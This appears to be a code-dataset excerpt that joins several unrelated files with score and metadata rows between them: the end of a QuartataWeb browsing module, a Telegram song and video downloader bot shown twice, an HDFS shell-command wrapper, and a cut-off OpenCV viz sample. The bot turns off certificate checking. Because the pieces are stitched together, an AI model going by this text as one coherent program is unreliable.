if result_type == 'Chemical':
return QuartataChemicalRecord(data_source, drug_group, input_type, query_type,
data, num_predictions, browser_type, job_id)
else:
LOGGER.warn('No other result types are supported yet')
return None
searchQuartataWeb.__doc__ += QuartataWebBrowser.__doc__
|
en
| 0.765276
|
# -*- coding: utf-8 -*- This module defines classes and functions for browsing QuartataWeb. ---------------------------------------------------------------------------------------- Based on code written by the CHARMM-GUI team (http://charmm-gui.org) and modified by <NAME> This suite uses the following softwares: a) python Splinter package (https://splinter.readthedocs.org/en/latest/) b) a web browser, such as Google Chrome or Mozilla Firefox c) the corresponding driver such as chromedriver (https://sites.google.com/a/chromium.org/chromedriver/downloads) for Chrome or geckodriver (https://github.com/mozilla/geckodriver/releases) for Firefox ---------------------------------------------------------------------------------------- Class to browse the QuartataWeb website. Instantiate a QuartataWebBrowser object instance. :arg data_source: source database for QuartataWeb analysis options are ``"DrugBank"`` or ``"STITCH"``. Default is ``"DrugBank"`` :type data_source: str :arg drug_group: group of drugs if using DrugBank options are ``"Approved"`` or ``"All"``. Default is ``"All"`` :type drug_group: str :arg input_type: number corresponding to the input type, options are ``1`` (Chemical and/or target) or ``2`` (A list of chemicals, targets or chemical combinations). Default is ``1`` :type input_type: int :arg query_type: number corresponding to the query type. Options are dependent on input_type. With input_type 1, they are: * ``1`` (chemical-target interaction) * ``2`` (chemical-chemical similarity) * ``3`` (target-target similarity) With input_type 2, they are: * ``1`` (chemicals) * ``2`` (targets) * ``3`` (chemical combinations) Default is ``1`` :type query_type: int :arg data: data to enter into the box or boxes. This varies depending on input type and query type, but will always be a list of strings. For input_type 1, a list with two items is expected. These will be one of the following depending on query_type: * With query_type 1, the first would be a chemical and the second a target. One of these can also be left blank. * With query_type 2, the first would be a chemical and the second a chemical. * With query_type 3, the first would be a target and the second a target. For input_type 2, a list with any length is expected. These will be one of the following depending on query_type: * With query_type 1, these would be chemicals. * With query_type 2, these would be targets. * With query_type 3, these would be pairs of chemicals, separated by semicolons. :type data: list :arg num_predictions: number of predictions to show or consider in addition to known interactions. Default is ``0``. With DrugBank and input_type 1, a second number can be provided in a list for secondary interactions. :type num_predictions: int, list :arg browser_type: browser type for navigation Default is ``"Chrome"`` :type browser_type: str :arg job_id: job ID for accessing previous jobs Default is ``None`` :type browser_type: int Update the home page with data from setting variables Set data_source and update home page :arg data_source: source database for QuartataWeb analysis options are ``"DrugBank"`` or ``"STITCH"``. Default is ``"DrugBank"`` :type data_source: str Set drug_group and update home page :arg group: group of drugs if using DrugBank options are ``"Approved"`` or ``"All"``. Default is ``"All"`` :type group: str Set input_type and update home page :arg input_type: number corresponding to the input type, options are ``1`` (Chemical and/or target) or ``2`` (A list of chemicals, targets or chemical combinations). Default is ``1`` :type input_type: int Set query_type and update home page :arg query_type: number corresponding to the query type. Options are dependent on input_type. With input_type 1, they are: * ``1`` (chemical-target interaction) * ``2`` (chemical-chemical similarity) * ``3`` (target-target similarity) With input_type 2, they are: * ``1`` (chemicals) * ``2`` (targets) * ``3`` (chemical combinations) Default is ``1`` :type query_type: int Set data and update home page :arg data: data to enter into the box or boxes. This varies depending on input type and query type, but will always be a list of strings. For input_type 1, a list with two items is expected. These will be one of the following depending on query_type: * With query_type 1, the first would be a chemical and the second a target. One of these can also be left blank. * With query_type 2, the first would be a chemical and the second a chemical. * With query_type 3, the first would be a target and the second a target. For input_type 2, a list with any length is expected. These will be one of the following depending on query_type: * With query_type 1, these would be chemicals. * With query_type 2, these would be targets. * With query_type 3, these would be pairs of chemicals, separated by semicolons. :type data: list Set num_predictions and update home page :arg num_predictions: number of predictions to show or consider in addition to known interactions. Default is ``0``. With DrugBank and input_type 1, a second number can be provided in a list for secondary interactions. :type num_predictions: int, list Set browser_type and update home page :arg browser_type: browser type for navigation Default is ``"Chrome"`` :type browser_type: str Set job_id and view results :arg job_id: job ID for accessing previous jobs Default is ``None`` :type browser_type: int View results by clicking submit or using a job_id Go to downloads page Go to working directory Go to working directory and parse chemicals for query protein. Updates self.chemical_data Class for handling chemical data from QuartataWebBrowser Instantiate a QuartataChemicalRecord object instance. Inputs are the same as QuartataWebBrowser. Fetch data Returns chemical list (filters may be applied) Returns SMILES list (filters may be applied) Returns SMILES for a particular chemical Returns a list of chemicals for the entries that were filtered out Filters out chemicals from the list and returns the updated list. Chemicals that satisfy any of the following criterion will be filtered out. (1) Molecular weight < lower_weight (must be a positive number); (2) Molecular weight > upper_weight (must be a positive number); (3) Confidence score < cutoff_score (must be a positive number); Please note that every time this function is run, this overrides any previous runs. Therefore, please provide all filters at once. Wrapper function for searching QuartataWeb
| 2.555782
| 3
|
handlers/song.py
|
ajmalyaseen/Nx-Music-DL
| 0
|
6628085
|
from __future__ import unicode_literals
import os
import requests
import aiohttp
import youtube_dl
import wget
import math
from pyrogram import filters, Client
from youtube_search import YoutubeSearch
from Python_ARQ import ARQ
from urllib.parse import urlparse
import aiofiles
import os
from random import randint
from youtubesearchpython import SearchVideos
from pyrogram.errors import FloodWait, MessageNotModified
from pyrogram.types import Chat, Message, User
import asyncio
from typing import Callable, Coroutine, Dict, List, Tuple, Union
import sys
import time
from helpers.errors import DurationLimitError
@Client.on_message(filters.command('song') & ~filters.channel)
def song(client, message):
user_id = message.from_user.id
user_name = message.from_user.first_name
rpk = "["+user_name+"](tg://user?id="+str(user_id)+")"
query = ''
for i in message.command[1:]:
query += ' ' + str(i)
print(query)
m = message.reply('🔎 Finding the song...\n\n@CoderzHex')
ydl_opts = {"format": "bestaudio[ext=m4a]"}
try:
results = YoutubeSearch(query, max_results=1).to_dict()
link = f"https://youtube.com{results[0]['url_suffix']}"
#print(results)
title = results[0]["title"][:40]
thumbnail = results[0]["thumbnails"][0]
thumb_name = f'thumb{title}.jpg'
thumb = requests.get(thumbnail, allow_redirects=True)
open(thumb_name, 'wb').write(thumb.content)
duration = results[0]["duration"]
url_suffix = results[0]["url_suffix"]
views = results[0]["views"]
except Exception as e:
m.edit(
"❌ Found Nothing.\nCheck Your Name or spelling"
)
print(str(e))
return
m.edit("**📥 Downloading the song**\n\n@CoderzHex")
try:
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
info_dict = ydl.extract_info(link, download=False)
audio_file = ydl.prepare_filename(info_dict)
ydl.process_info(info_dict)
rep = '**🎧 Uploaded by @CoderzHEX **'
secmul, dur, dur_arr = 1, 0, duration.split(':')
for i in range(len(dur_arr)-1, -1, -1):
dur += (int(dur_arr[i]) * secmul)
secmul *= 60
message.reply_audio(audio_file, caption=rep, thumb=thumb_name, parse_mode='md', title=title, duration=dur)
m.delete()
except Exception as e:
m.edit('❌ Error')
print(e)
try:
os.remove(audio_file)
os.remove(thumb_name)
except Exception as e:
print(e)
def get_text(message: Message) -> [None, str]:
text_to_return = message.text
if message.text is None:
return None
if " " in text_to_return:
try:
return message.text.split(None, 1)[1]
except IndexError:
return None
else:
return None
def humanbytes(size):
if not size:
return ""
power = 2 ** 10
raised_to_pow = 0
dict_power_n = {0: "", 1: "Ki", 2: "Mi", 3: "Gi", 4: "Ti"}
while size > power:
size /= power
raised_to_pow += 1
return str(round(size, 2)) + " " + dict_power_n[raised_to_pow] + "B"
async def progress(current, total, message, start, type_of_ps, file_name=None):
now = time.time()
diff = now - start
if round(diff % 10.00) == 0 or current == total:
percentage = current * 100 / total
speed = current / diff
elapsed_time = round(diff) * 1000
if elapsed_time == 0:
return
time_to_completion = round((total - current) / speed) * 1000
estimated_total_time = elapsed_time + time_to_completion
progress_str = "{0}{1} {2}%\n".format(
"".join(["█" for i in range(math.floor(percentage / 10))]),
"".join(["░" for i in range(10 - math.floor(percentage / 10))]),
round(percentage, 2),
)
tmp = progress_str + "{0} of {1}\nETA: {2}".format(
humanbytes(current), humanbytes(total), time_formatter(estimated_total_time)
)
if file_name:
try:
await message.edit(
"{}\n**File Name:** `{}`\n{}".format(type_of_ps, file_name, tmp)
)
except FloodWait as e:
await asyncio.sleep(e.x)
except MessageNotModified:
pass
else:
try:
await message.edit("{}\n{}".format(type_of_ps, tmp))
except FloodWait as e:
await asyncio.sleep(e.x)
except MessageNotModified:
pass
def get_user(message: Message, text: str) -> [int, str, None]:
if text is None:
asplit = None
else:
asplit = text.split(" ", 1)
user_s = None
reason_ = None
if message.reply_to_message:
user_s = message.reply_to_message.from_user.id
reason_ = text if text else None
elif asplit is None:
return None, None
elif len(asplit[0]) > 0:
user_s = int(asplit[0]) if asplit[0].isdigit() else asplit[0]
if len(asplit) == 2:
reason_ = asplit[1]
return user_s, reason_
def get_readable_time(seconds: int) -> int:
count = 0
ping_time = ""
time_list = []
time_suffix_list = ["s", "m", "h", "days"]
while count < 4:
count += 1
if count < 3:
remainder, result = divmod(seconds, 60)
else:
remainder, result = divmod(seconds, 24)
if seconds == 0 and remainder == 0:
break
time_list.append(int(result))
seconds = int(remainder)
for x in range(len(time_list)):
time_list[x] = str(time_list[x]) + time_suffix_list[x]
if len(time_list) == 4:
ping_time += time_list.pop() + ", "
time_list.reverse()
ping_time += ":".join(time_list)
return ping_time
def time_formatter(milliseconds: int) -> str:
seconds, milliseconds = divmod(int(milliseconds), 1000)
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
days, hours = divmod(hours, 24)
tmp = (
((str(days) + " day(s), ") if days else "")
+ ((str(hours) + " hour(s), ") if hours else "")
+ ((str(minutes) + " minute(s), ") if minutes else "")
+ ((str(seconds) + " second(s), ") if seconds else "")
+ ((str(milliseconds) + " millisecond(s), ") if milliseconds else "")
)
return tmp[:-2]
ydl_opts = {
'format': 'bestaudio/best',
'writethumbnail': True,
'postprocessors': [{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': '192'
}]
}
def get_file_extension_from_url(url):
url_path = urlparse(url).path
basename = os.path.basename(url_path)
return basename.split(".")[-1]
# Funtion To Download Song
async def download_song(url):
song_name = f"{randint(6969, 6999)}.mp3"
async with aiohttp.ClientSession() as session:
async with session.get(url) as resp:
if resp.status == 200:
f = await aiofiles.open(song_name, mode='wb')
await f.write(await resp.read())
await f.close()
return song_name
is_downloading = False
def time_to_seconds(time):
stringt = str(time)
return sum(int(x) * 60 ** i for i, x in enumerate(reversed(stringt.split(':'))))
@Client.on_message(filters.command("saavn") & ~filters.edited)
async def jssong(_, message):
global is_downloading
if len(message.command) < 2:
await message.reply_text("/saavn requires an argument.")
return
if is_downloading:
await message.reply_text("Another download is in progress, try again after sometime.")
return
is_downloading = True
text = message.text.split(None, 1)[1]
query = text.replace(" ", "%20")
m = await message.reply_text("Searching...")
try:
songs = await arq.saavn(query)
sname = songs[0].song
slink = songs[0].media_url
ssingers = songs[0].singers
await m.edit("Downloading")
song = await download_song(slink)
await m.edit("Uploading")
await message.reply_audio(audio=song, title=sname,
performer=ssingers)
os.remove(song)
await m.delete()
except Exception as e:
is_downloading = False
await m.edit(str(e))
return
is_downloading = False
# Deezer Music
@Client.on_message(filters.command("deezer") & ~filters.edited)
async def deezsong(_, message):
global is_downloading
if len(message.command) < 2:
await message.reply_text("/deezer requires an argument.")
return
if is_downloading:
await message.reply_text("Another download is in progress, try again after sometime.")
return
is_downloading = True
text = message.text.split(None, 1)[1]
query = text.replace(" ", "%20")
m = await message.reply_text("Searching...")
try:
songs = await arq.deezer(query, 1)
title = songs[0].title
url = songs[0].url
artist = songs[0].artist
await m.edit("Downloading")
song = await download_song(url)
await m.edit("Uploading")
await message.reply_audio(audio=song, title=title,
performer=artist)
os.remove(song)
await m.delete()
except Exception as e:
is_downloading = False
await m.edit(str(e))
return
is_downloading = False
@Client.on_message(filters.command(["vsong", "vid"]))
async def ytmusic(client,message: Message):
global is_downloading
if is_downloading:
await message.reply_text("Another download is in progress, try again after sometime.")
return
urlissed = get_text(message)
pablo = await client.send_message(
message.chat.id,
f"`Getting {urlissed} From Youtube Servers. Please Wait.`")
if not urlissed:
await pablo.edit("Invalid Command Syntax, Please Check Help Menu To Know More!")
return
search = SearchVideos(f"{urlissed}", offset=1, mode="dict", max_results=1)
mi = search.result()
mio = mi["search_result"]
mo = mio[0]["link"]
thum = mio[0]["title"]
fridayz = mio[0]["id"]
thums = mio[0]["channel"]
kekme = f"https://img.youtube.com/vi/{fridayz}/hqdefault.jpg"
await asyncio.sleep(0.6)
url = mo
sedlyf = wget.download(kekme)
opts = {
"format": "best",
"addmetadata": True,
"key": "FFmpegMetadata",
"prefer_ffmpeg": True,
"geo_bypass": True,
"nocheckcertificate": True,
"postprocessors": [
{"key": "FFmpegVideoConvertor", "preferedformat": "mp4"}
],
"outtmpl": "%(id)s.mp4",
"logtostderr": False,
"quiet": True,
}
try:
is_downloading = True
with youtube_dl.YoutubeDL(opts) as ytdl:
infoo = ytdl.extract_info(url, False)
duration = round(infoo["duration"] / 60)
if duration > 8:
await pablo.edit(
f"❌ Videos longer than 8 minute(s) aren't allowed, the provided video is {duration} minute(s)"
)
is_downloading = False
return
ytdl_data = ytdl.extract_info(url, download=True)
except Exception as e:
#await pablo.edit(event, f"**Failed To Download** \n**Error :** `{str(e)}`")
is_downloading = False
return
c_time = time.time()
file_stark = f"{ytdl_data['id']}.mp4"
capy = f"𝐕𝐢𝐝𝐞𝐨 𝐍𝐚𝐦𝐞 : `{thum}` \n\n𝐑𝐞𝐪𝐮𝐞𝐬𝐭𝐞𝐝 𝐍𝐚𝐦𝐞: `{urlissed}` \n\n𝐘𝐓 𝐜𝐡𝐚𝐧𝐧𝐞𝐥: `{thums}` \n\n𝐋𝐢𝐧𝐤 : `{mo}` \n\n🎼𝐔𝐩𝐥𝐨𝐚𝐝𝐞𝐝 𝐁𝐲 **@CoderzHEX**"
await client.send_video(message.chat.id, video = open(file_stark, "rb"), duration = int(ytdl_data["duration"]), file_name = str(ytdl_data["title"]), thumb = sedlyf, caption = capy, supports_streaming = True , progress=progress, progress_args=(pablo, c_time, f'`Uploading {urlissed} Song From YouTube Music!`', file_stark))
await pablo.delete()
is_downloading = False
for files in (sedlyf, file_stark):
if files and os.path.exists(files):
os.remove(files)
|
from __future__ import unicode_literals
import os
import requests
import aiohttp
import youtube_dl
import wget
import math
from pyrogram import filters, Client
from youtube_search import YoutubeSearch
from Python_ARQ import ARQ
from urllib.parse import urlparse
import aiofiles
import os
from random import randint
from youtubesearchpython import SearchVideos
from pyrogram.errors import FloodWait, MessageNotModified
from pyrogram.types import Chat, Message, User
import asyncio
from typing import Callable, Coroutine, Dict, List, Tuple, Union
import sys
import time
from helpers.errors import DurationLimitError
@Client.on_message(filters.command('song') & ~filters.channel)
def song(client, message):
user_id = message.from_user.id
user_name = message.from_user.first_name
rpk = "["+user_name+"](tg://user?id="+str(user_id)+")"
query = ''
for i in message.command[1:]:
query += ' ' + str(i)
print(query)
m = message.reply('🔎 Finding the song...\n\n@CoderzHex')
ydl_opts = {"format": "bestaudio[ext=m4a]"}
try:
results = YoutubeSearch(query, max_results=1).to_dict()
link = f"https://youtube.com{results[0]['url_suffix']}"
#print(results)
title = results[0]["title"][:40]
thumbnail = results[0]["thumbnails"][0]
thumb_name = f'thumb{title}.jpg'
thumb = requests.get(thumbnail, allow_redirects=True)
open(thumb_name, 'wb').write(thumb.content)
duration = results[0]["duration"]
url_suffix = results[0]["url_suffix"]
views = results[0]["views"]
except Exception as e:
m.edit(
"❌ Found Nothing.\nCheck Your Name or spelling"
)
print(str(e))
return
m.edit("**📥 Downloading the song**\n\n@CoderzHex")
try:
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
info_dict = ydl.extract_info(link, download=False)
audio_file = ydl.prepare_filename(info_dict)
ydl.process_info(info_dict)
rep = '**🎧 Uploaded by @CoderzHEX **'
secmul, dur, dur_arr = 1, 0, duration.split(':')
for i in range(len(dur_arr)-1, -1, -1):
dur += (int(dur_arr[i]) * secmul)
secmul *= 60
message.reply_audio(audio_file, caption=rep, thumb=thumb_name, parse_mode='md', title=title, duration=dur)
m.delete()
except Exception as e:
m.edit('❌ Error')
print(e)
try:
os.remove(audio_file)
os.remove(thumb_name)
except Exception as e:
print(e)
def get_text(message: Message) -> [None, str]:
text_to_return = message.text
if message.text is None:
return None
if " " in text_to_return:
try:
return message.text.split(None, 1)[1]
except IndexError:
return None
else:
return None
def humanbytes(size):
if not size:
return ""
power = 2 ** 10
raised_to_pow = 0
dict_power_n = {0: "", 1: "Ki", 2: "Mi", 3: "Gi", 4: "Ti"}
while size > power:
size /= power
raised_to_pow += 1
return str(round(size, 2)) + " " + dict_power_n[raised_to_pow] + "B"
async def progress(current, total, message, start, type_of_ps, file_name=None):
now = time.time()
diff = now - start
if round(diff % 10.00) == 0 or current == total:
percentage = current * 100 / total
speed = current / diff
elapsed_time = round(diff) * 1000
if elapsed_time == 0:
return
time_to_completion = round((total - current) / speed) * 1000
estimated_total_time = elapsed_time + time_to_completion
progress_str = "{0}{1} {2}%\n".format(
"".join(["█" for i in range(math.floor(percentage / 10))]),
"".join(["░" for i in range(10 - math.floor(percentage / 10))]),
round(percentage, 2),
)
tmp = progress_str + "{0} of {1}\nETA: {2}".format(
humanbytes(current), humanbytes(total), time_formatter(estimated_total_time)
)
if file_name:
try:
await message.edit(
"{}\n**File Name:** `{}`\n{}".format(type_of_ps, file_name, tmp)
)
except FloodWait as e:
await asyncio.sleep(e.x)
except MessageNotModified:
pass
else:
try:
await message.edit("{}\n{}".format(type_of_ps, tmp))
except FloodWait as e:
await asyncio.sleep(e.x)
except MessageNotModified:
pass
def get_user(message: Message, text: str) -> [int, str, None]:
if text is None:
asplit = None
else:
asplit = text.split(" ", 1)
user_s = None
reason_ = None
if message.reply_to_message:
user_s = message.reply_to_message.from_user.id
reason_ = text if text else None
elif asplit is None:
return None, None
elif len(asplit[0]) > 0:
user_s = int(asplit[0]) if asplit[0].isdigit() else asplit[0]
if len(asplit) == 2:
reason_ = asplit[1]
return user_s, reason_
def get_readable_time(seconds: int) -> int:
count = 0
ping_time = ""
time_list = []
time_suffix_list = ["s", "m", "h", "days"]
while count < 4:
count += 1
if count < 3:
remainder, result = divmod(seconds, 60)
else:
remainder, result = divmod(seconds, 24)
if seconds == 0 and remainder == 0:
break
time_list.append(int(result))
seconds = int(remainder)
for x in range(len(time_list)):
time_list[x] = str(time_list[x]) + time_suffix_list[x]
if len(time_list) == 4:
ping_time += time_list.pop() + ", "
time_list.reverse()
ping_time += ":".join(time_list)
return ping_time
def time_formatter(milliseconds: int) -> str:
seconds, milliseconds = divmod(int(milliseconds), 1000)
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
days, hours = divmod(hours, 24)
tmp = (
((str(days) + " day(s), ") if days else "")
+ ((str(hours) + " hour(s), ") if hours else "")
+ ((str(minutes) + " minute(s), ") if minutes else "")
+ ((str(seconds) + " second(s), ") if seconds else "")
+ ((str(milliseconds) + " millisecond(s), ") if milliseconds else "")
)
return tmp[:-2]
ydl_opts = {
'format': 'bestaudio/best',
'writethumbnail': True,
'postprocessors': [{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': '192'
}]
}
def get_file_extension_from_url(url):
url_path = urlparse(url).path
basename = os.path.basename(url_path)
return basename.split(".")[-1]
# Funtion To Download Song
async def download_song(url):
song_name = f"{randint(6969, 6999)}.mp3"
async with aiohttp.ClientSession() as session:
async with session.get(url) as resp:
if resp.status == 200:
f = await aiofiles.open(song_name, mode='wb')
await f.write(await resp.read())
await f.close()
return song_name
is_downloading = False
def time_to_seconds(time):
stringt = str(time)
return sum(int(x) * 60 ** i for i, x in enumerate(reversed(stringt.split(':'))))
@Client.on_message(filters.command("saavn") & ~filters.edited)
async def jssong(_, message):
global is_downloading
if len(message.command) < 2:
await message.reply_text("/saavn requires an argument.")
return
if is_downloading:
await message.reply_text("Another download is in progress, try again after sometime.")
return
is_downloading = True
text = message.text.split(None, 1)[1]
query = text.replace(" ", "%20")
m = await message.reply_text("Searching...")
try:
songs = await arq.saavn(query)
sname = songs[0].song
slink = songs[0].media_url
ssingers = songs[0].singers
await m.edit("Downloading")
song = await download_song(slink)
await m.edit("Uploading")
await message.reply_audio(audio=song, title=sname,
performer=ssingers)
os.remove(song)
await m.delete()
except Exception as e:
is_downloading = False
await m.edit(str(e))
return
is_downloading = False
# Deezer Music
@Client.on_message(filters.command("deezer") & ~filters.edited)
async def deezsong(_, message):
global is_downloading
if len(message.command) < 2:
await message.reply_text("/deezer requires an argument.")
return
if is_downloading:
await message.reply_text("Another download is in progress, try again after sometime.")
return
is_downloading = True
text = message.text.split(None, 1)[1]
query = text.replace(" ", "%20")
m = await message.reply_text("Searching...")
try:
songs = await arq.deezer(query, 1)
title = songs[0].title
url = songs[0].url
artist = songs[0].artist
await m.edit("Downloading")
song = await download_song(url)
await m.edit("Uploading")
await message.reply_audio(audio=song, title=title,
performer=artist)
os.remove(song)
await m.delete()
except Exception as e:
is_downloading = False
await m.edit(str(e))
return
is_downloading = False
@Client.on_message(filters.command(["vsong", "vid"]))
async def ytmusic(client,message: Message):
global is_downloading
if is_downloading:
await message.reply_text("Another download is in progress, try again after sometime.")
return
urlissed = get_text(message)
pablo = await client.send_message(
message.chat.id,
f"`Getting {urlissed} From Youtube Servers. Please Wait.`")
if not urlissed:
await pablo.edit("Invalid Command Syntax, Please Check Help Menu To Know More!")
return
search = SearchVideos(f"{urlissed}", offset=1, mode="dict", max_results=1)
mi = search.result()
mio = mi["search_result"]
mo = mio[0]["link"]
thum = mio[0]["title"]
fridayz = mio[0]["id"]
thums = mio[0]["channel"]
kekme = f"https://img.youtube.com/vi/{fridayz}/hqdefault.jpg"
await asyncio.sleep(0.6)
url = mo
sedlyf = wget.download(kekme)
opts = {
"format": "best",
"addmetadata": True,
"key": "FFmpegMetadata",
"prefer_ffmpeg": True,
"geo_bypass": True,
"nocheckcertificate": True,
"postprocessors": [
{"key": "FFmpegVideoConvertor", "preferedformat": "mp4"}
],
"outtmpl": "%(id)s.mp4",
"logtostderr": False,
"quiet": True,
}
try:
is_downloading = True
with youtube_dl.YoutubeDL(opts) as ytdl:
infoo = ytdl.extract_info(url, False)
duration = round(infoo["duration"] / 60)
if duration > 8:
await pablo.edit(
f"❌ Videos longer than 8 minute(s) aren't allowed, the provided video is {duration} minute(s)"
)
is_downloading = False
return
ytdl_data = ytdl.extract_info(url, download=True)
except Exception as e:
#await pablo.edit(event, f"**Failed To Download** \n**Error :** `{str(e)}`")
is_downloading = False
return
c_time = time.time()
file_stark = f"{ytdl_data['id']}.mp4"
capy = f"𝐕𝐢𝐝𝐞𝐨 𝐍𝐚𝐦𝐞 : `{thum}` \n\n𝐑𝐞𝐪𝐮𝐞𝐬𝐭𝐞𝐝 𝐍𝐚𝐦𝐞: `{urlissed}` \n\n𝐘𝐓 𝐜𝐡𝐚𝐧𝐧𝐞𝐥: `{thums}` \n\n𝐋𝐢𝐧𝐤 : `{mo}` \n\n🎼𝐔𝐩𝐥𝐨𝐚𝐝𝐞𝐝 𝐁𝐲 **@CoderzHEX**"
await client.send_video(message.chat.id, video = open(file_stark, "rb"), duration = int(ytdl_data["duration"]), file_name = str(ytdl_data["title"]), thumb = sedlyf, caption = capy, supports_streaming = True , progress=progress, progress_args=(pablo, c_time, f'`Uploading {urlissed} Song From YouTube Music!`', file_stark))
await pablo.delete()
is_downloading = False
for files in (sedlyf, file_stark):
if files and os.path.exists(files):
os.remove(files)
|
en
| 0.197836
|
#print(results) # Funtion To Download Song # Deezer Music #await pablo.edit(event, f"**Failed To Download** \n**Error :** `{str(e)}`")
| 2.465405
| 2
|
meutils/cmds/hdfs_cmd.py
|
Jie-Yuan/MeUtils
| 3
|
6628086
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Project : MeUtils.
# @File : hdfs_cmd
# @Time : 2021/1/20 10:15 上午
# @Author : yuanjie
# @Email : <EMAIL>
# @Software : PyCharm
# @Description :
from meutils.pipe import *
class HDFS(object):
HADOOP_HOME = os.environ.get('HADOOP_HOME', '~/infra-client/bin')
HDFS_CLUSTER_NAME = os.environ.get('HDFS_CLUSTER_NAME', 'zjyprc-hadoop')
HDFS_CMD = f"{HADOOP_HOME}/hdfs --cluster {HDFS_CLUSTER_NAME} dfs" # f"{HADOOP_HOME}/hadoop --cluster {HDFS_CLUSTER_NAME} fs"
@classmethod
def check_path_isexist(cls, path):
cmd = f"-test -e {path}" # 包含?-test -d
status, output = cls.magic_cmd(cmd)
rst = False if status != 0 else True
logger.info(f'Path Exist: {rst}')
return rst
@classmethod
def touchz(cls, path):
"""
:param path: /user/h_browser/algo/yuanjie/jars/xx.txt
:return:
"""
cmd = f"-touchz {path}"
return cls.magic_cmd(cmd)
@classmethod
def wc_l(cls, path):
"""
:param path: /user/h_data_platform/platform/browser/push_group/locals/江苏_南京/date=20210120/*
:return:
"""
cmd = f"-cat {path} | wc -l"
return cls.magic_cmd(cmd)
@classmethod
def magic_cmd(cls, cmd):
"""
:param cmd: -cat /user/h_browser/algo/yuanjie/jars/vec.csv
:return:
"""
cmd = f"{cls.HDFS_CMD} {cmd}"
return magic_cmd(cmd)
@classmethod
def push2hdfs(cls, input, output):
cls.magic_cmd(f"-mkdir -p {output}")
cls.magic_cmd(f"-put -f {input} {output}")
cls.touchz(f"{output}/_SUCCESS")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Project : MeUtils.
# @File : hdfs_cmd
# @Time : 2021/1/20 10:15 上午
# @Author : yuanjie
# @Email : <EMAIL>
# @Software : PyCharm
# @Description :
from meutils.pipe import *
class HDFS(object):
HADOOP_HOME = os.environ.get('HADOOP_HOME', '~/infra-client/bin')
HDFS_CLUSTER_NAME = os.environ.get('HDFS_CLUSTER_NAME', 'zjyprc-hadoop')
HDFS_CMD = f"{HADOOP_HOME}/hdfs --cluster {HDFS_CLUSTER_NAME} dfs" # f"{HADOOP_HOME}/hadoop --cluster {HDFS_CLUSTER_NAME} fs"
@classmethod
def check_path_isexist(cls, path):
cmd = f"-test -e {path}" # 包含?-test -d
status, output = cls.magic_cmd(cmd)
rst = False if status != 0 else True
logger.info(f'Path Exist: {rst}')
return rst
@classmethod
def touchz(cls, path):
"""
:param path: /user/h_browser/algo/yuanjie/jars/xx.txt
:return:
"""
cmd = f"-touchz {path}"
return cls.magic_cmd(cmd)
@classmethod
def wc_l(cls, path):
"""
:param path: /user/h_data_platform/platform/browser/push_group/locals/江苏_南京/date=20210120/*
:return:
"""
cmd = f"-cat {path} | wc -l"
return cls.magic_cmd(cmd)
@classmethod
def magic_cmd(cls, cmd):
"""
:param cmd: -cat /user/h_browser/algo/yuanjie/jars/vec.csv
:return:
"""
cmd = f"{cls.HDFS_CMD} {cmd}"
return magic_cmd(cmd)
@classmethod
def push2hdfs(cls, input, output):
cls.magic_cmd(f"-mkdir -p {output}")
cls.magic_cmd(f"-put -f {input} {output}")
cls.touchz(f"{output}/_SUCCESS")
|
en
| 0.240426
|
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Project : MeUtils. # @File : hdfs_cmd # @Time : 2021/1/20 10:15 上午 # @Author : yuanjie # @Email : <EMAIL> # @Software : PyCharm # @Description : # f"{HADOOP_HOME}/hadoop --cluster {HDFS_CLUSTER_NAME} fs" # 包含?-test -d :param path: /user/h_browser/algo/yuanjie/jars/xx.txt :return: :param path: /user/h_data_platform/platform/browser/push_group/locals/江苏_南京/date=20210120/* :return: :param cmd: -cat /user/h_browser/algo/yuanjie/jars/vec.csv :return:
| 2.313786
| 2
|
modules/viz/samples/viz_sample_02.py
|
pccvlab/opencv_contrib
| 7,158
|
6628087
|
<filename>modules/viz/samples/viz_sample_02.py<gh_stars>1000+
import numpy as np
import cv2 as cv
my_window = cv.viz_Viz3d("Coordinate Frame")
axe = cv.viz_WCoordinateSystem()
axis = cv.viz_WLine((-1.0,-1.0,-1.0), (1.0,1.0,1.0), cv.viz_Color().green())
axis.setRenderingProperty(cv.viz.LINE_WIDTH, 4.0);
my_window.showWidget("axe",axis)
plan = cv.viz_WPlane((-1.0,-1.0,-1.0), (1.0,.0,.0), (-.0,.0,-1.0))
#my_window.showWidget("plan", plan)
cube = cv.viz_WCube((0.5,0.5,0.0), (0.0,0.0,-0.5), True, cv.viz_Color().blue())
my_window.showWidget("Cube Widget",cube)
pi = np.arccos(-1)
print("First event loop is over")
my_window.spin()
print("Second event loop is over")
my_window.spinOnce(1, True)
translation_phase = 0.0
translation = 0.0
rot_mat = np.zeros(shape=(3, 3), dtype=np.float32)
rot_vec = np.zeros(shape=(1,3),dtype=np.float32)
while not my_window.wasStopped():
rot_vec[0, 0] += np.pi * 0.01
rot_vec[0, 1] += np.pi * 0.01
rot_vec[0, 2] += np.pi * 0.01
translation_phase += pi * 0.01
translation = np.sin(translation_phase)
pose = cv.viz_Affine3d(rot_vec, (translation, translation, translation))
my_window.setWidgetPose("Cube Widget",pose)
my_window.spinOnce(1, True);
print("Last event loop is over")
|
<filename>modules/viz/samples/viz_sample_02.py<gh_stars>1000+
import numpy as np
import cv2 as cv
my_window = cv.viz_Viz3d("Coordinate Frame")
axe = cv.viz_WCoordinateSystem()
axis = cv.viz_WLine((-1.0,-1.0,-1.0), (1.0,1.0,1.0), cv.viz_Color().green())
axis.setRenderingProperty(cv.viz.LINE_WIDTH, 4.0);
my_window.showWidget("axe",axis)
plan = cv.viz_WPlane((-1.0,-1.0,-1.0), (1.0,.0,.0), (-.0,.0,-1.0))
#my_window.showWidget("plan", plan)
cube = cv.viz_WCube((0.5,0.5,0.0), (0.0,0.0,-0.5), True, cv.viz_Color().blue())
my_window.showWidget("Cube Widget",cube)
pi = np.arccos(-1)
print("First event loop is over")
my_window.spin()
print("Second event loop is over")
my_window.spinOnce(1, True)
translation_phase = 0.0
translation = 0.0
rot_mat = np.zeros(shape=(3, 3), dtype=np.float32)
